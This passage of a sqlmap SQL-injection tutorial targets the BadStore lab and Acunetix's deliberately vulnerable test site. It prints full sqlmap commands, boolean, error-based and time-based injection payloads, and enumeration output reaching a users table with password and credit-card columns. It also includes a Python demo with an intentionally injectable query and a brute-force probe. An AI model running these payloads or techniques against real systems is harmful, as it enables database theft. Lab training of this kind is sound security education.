[10:34:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:34:18

The same limitation applies: only column names present in common-columns.txt can be found. The application's own query returns 4 columns (that is how many the UNION needed), so it reads more than price and qty; the other names simply were not in the wordlist.

E) Remaining databases

As we have seen, there is no table called usuarios or anything like it; only the products table turned up, so by this route we cannot obtain users or passwords. Let us check the other databases then:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:36:17

[10:36:17] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:36:17] [INFO] resuming injection data from session file
[10:36:17] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:36:17] [INFO] resuming brute forced table name 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'price' for table 'itemdb' from session file
[10:36:17] [INFO] resuming brute forced column name 'qty' for table 'itemdb' from session file
[10:36:17] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same UNION injection point listed in step A)
[10:36:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:36:18] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
[10:36:18] [INFO] fetching database names
[10:36:18] [INFO] fetching number of databases
[10:36:18] [ERROR] unable to retrieve the number of databases
[10:36:18] [INFO] falling back to current database
[10:36:18] [INFO] fetching current database
[10:36:18] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session': badstoredb
available databases [1]:
[*] badstoredb
[10:36:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:36:18

Without information_schema, sqlmap tries to read the database list from the mysql system schema; that query failed here (most likely the BadStore database user is not allowed to read the mysql schema), so sqlmap fell back to the current database and the only entry it can report is badstoredb. Compared with section 1, where the root connection exposed every database on the server, this is what a less privileged database account looks like from the attacker's side.
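The difference between this section and section 1 is the missing catalog, and the following Python script is an added example (not part of the report nor of sqlmap) that shows both routes side by side against a constructed SQLite stand-in for badstoredb: an itemdb table with the two recovered columns price and qty plus two invented ones, id and name, and a hypothetical badstore.cgi search that interpolates searchquery into a LIKE pattern. With a catalog available (sqlite_master playing the role of information_schema.tables) one injected UNION query lists every table; without it, each candidate from a miniature common-tables/common-columns list is probed individually with a COUNT(*) that only succeeds when the object exists. The marker ':vtr:' is the decoded CHAR(58,118,116,114,58) from the payload above; MySQL's # comment is written as -- for SQLite.

```python
import sqlite3

# Constructed stand-in for badstoredb: one table, itemdb, with the two columns
# sqlmap recovered (price, qty) plus two hypothetical ones (id, name) so the
# search has something to match. SQLite replaces MySQL 4 only to run offline.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
    CREATE TABLE itemdb (id INTEGER, name TEXT, price NUMERIC, qty NUMERIC);
    INSERT INTO itemdb VALUES (1, 'hi-fi',       199.99, 3);
    INSERT INTO itemdb VALUES (2, 'hipster hat',  12.50, 40);
""")

MARK = ":vtr:"  # decoded from CHAR(58,118,116,114,58) in sqlmap's payload


def search(q: str):
    """Hypothetical badstore.cgi search (not its source): 'searchquery' lands
    inside a quoted LIKE pattern, the context the payload closes with hi'."""
    sql = f"SELECT id, name, price, qty FROM itemdb WHERE name LIKE '%{q}%'"
    try:
        return CONN.execute(sql).fetchall()
    except sqlite3.Error:
        return None  # SQL error: the CGI would return an error page instead


def union_values(expr_with_from: str) -> list:
    """Inject <expr_with_from> as the 4th UNION column, marked, and pull every
    marked value back out of the 'page'. Returns [] when the query errored.
    ('--' replaces MySQL's '#' comment.)"""
    rows = search(f"hi' UNION ALL SELECT NULL, NULL, NULL, '{MARK}' || {expr_with_from}-- ")
    if rows is None:
        return []
    return [str(c)[len(MARK):] for row in rows for c in row if str(c).startswith(MARK)]


def tables_via_catalog() -> list:
    """Route 1, needs a catalog: information_schema.tables on MySQL >= 5.0,
    sqlite_master here. One query lists every table; this is what --tables
    does when it does not have to fall back."""
    return union_values("name FROM sqlite_master WHERE type='table'")


def table_exists(table: str) -> bool:
    """Route 2, no catalog (MySQL < 5.0): ask about one guessed name. COUNT(*)
    on a real table always yields a marked row, even when the table is empty;
    a wrong name makes the whole statement fail, so no marker comes back."""
    return bool(union_values(f"(SELECT COUNT(*) FROM {table})"))


def column_exists(table: str, column: str) -> bool:
    """The same trick for column names (sqlmap's common-columns step)."""
    return bool(union_values(f"(SELECT COUNT({column}) FROM {table})"))


def brute_force(wordlist, probe) -> list:
    """Run an existence probe over a wordlist: one request per candidate, which
    is why sqlmap warned that single-threaded mode 'could take a while'."""
    return [word for word in wordlist if probe(word)]


# Constructed miniatures of sqlmap's txt/common-tables.txt and common-columns.txt.
COMMON_TABLES = ["users", "user", "accounts", "orders", "itemdb", "products"]
COMMON_COLUMNS = ["id", "username", "password", "price", "email", "qty"]

if __name__ == "__main__":
    print("catalog:", tables_via_catalog())
    print("guessed tables:", brute_force(COMMON_TABLES, table_exists))
    print("guessed columns:", brute_force(COMMON_COLUMNS, lambda c: column_exists("itemdb", c)))
```

The catalog route finds itemdb in one request; the wordlist route finds it too, but only because the name is in the list, and it finds id, price and qty while missing name, which is the blind spot the BadStore run above shows in practice.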


4. Acunetix

Entramos en la web y si damos unas vueltas por ella , en el apartado categories vemos que la url nos aparece ?cat=1, es un indicio para comprobar. http://testphp.vulnweb.com/listproducts.php?cat=1

We go to sqlmap and try:

A) Database server and version

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:52:48

[10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[10:52:49] [INFO] testing connection to the target url
[10:52:49] [INFO] testing if the url is stable, wait a few seconds
[10:52:50] [INFO] url is stable
[10:52:50] [INFO] testing if GET parameter 'cat' is dynamic
[10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic
[10:52:51] [INFO] GET parameter 'cat' is dynamic
[10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injectable (possible DBMS: MySQL)
[10:52:51] [INFO] testing sql injection on GET parameter 'cat'
[10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' injectable
[10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[10:54:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 10:54:07

The cat parameter is vulnerable: sqlmap confirmed three techniques on it (boolean-based blind, error-based and time-based blind; the UNION tests did not succeed) and fingerprinted the stack as Apache 2.0.55, PHP 5.1.2 and MySQL 5.0 on Ubuntu. Because the back end is MySQL 5.0, information_schema is available, so the following steps can enumerate the schema directly instead of brute-forcing names as in the BadStore case.


B) Database name

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:52:15

[11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:52:15] [INFO] resuming injection data from session file
[11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:15] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:52:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:52:16] [INFO] fetching current database
[11:52:18] [INFO] retrieved: acuart
current database: 'acuart'
[11:52:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com'

[*] shutting down at: 11:52:18

C) Tables

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables -D acuart

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:54:12

[11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:54:12] [INFO] resuming injection data from session file
[11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:54:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:54:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:54:14] [INFO] fetching tables for database 'acuart'
[11:54:14] [INFO] the SQL query used returns 7 entries
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: artists
[11:54:15] [INFO] retrieved: acuart
[11:54:15] [INFO] retrieved: carts
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: categ
[11:54:16] [INFO] retrieved: acuart
[11:54:16] [INFO] retrieved: featured
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: guestbook
[11:54:17] [INFO] retrieved: acuart
[11:54:17] [INFO] retrieved: pictures
[11:54:18] [INFO] retrieved: acuart
[11:54:18] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+


D) Columns

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --columns -T users -D acuart

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:56:55

[11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session' as session file
[11:56:55] [INFO] resuming injection data from session file
[11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 4423=4423

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[11:56:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[11:56:56] [INFO] fetching columns for table 'users' on database 'acuart'
[11:56:56] [INFO] the SQL query used returns 8 entries
[11:56:56] [INFO] retrieved: uname
[11:56:56] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: pass
[11:56:57] [INFO] retrieved: varchar(100)
[11:56:57] [INFO] retrieved: cc
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: address
[11:56:58] [INFO] retrieved: mediumtext
[11:56:58] [INFO] retrieved: email
[11:56:58] [INFO] retrieved: varchar(100)
[11:56:58] [INFO] retrieved: name
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: phone
[11:56:59] [INFO] retrieved: varchar(100)
[11:56:59] [INFO] retrieved: cart
[11:56:59] [INFO] retrieved: varchar(100)
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+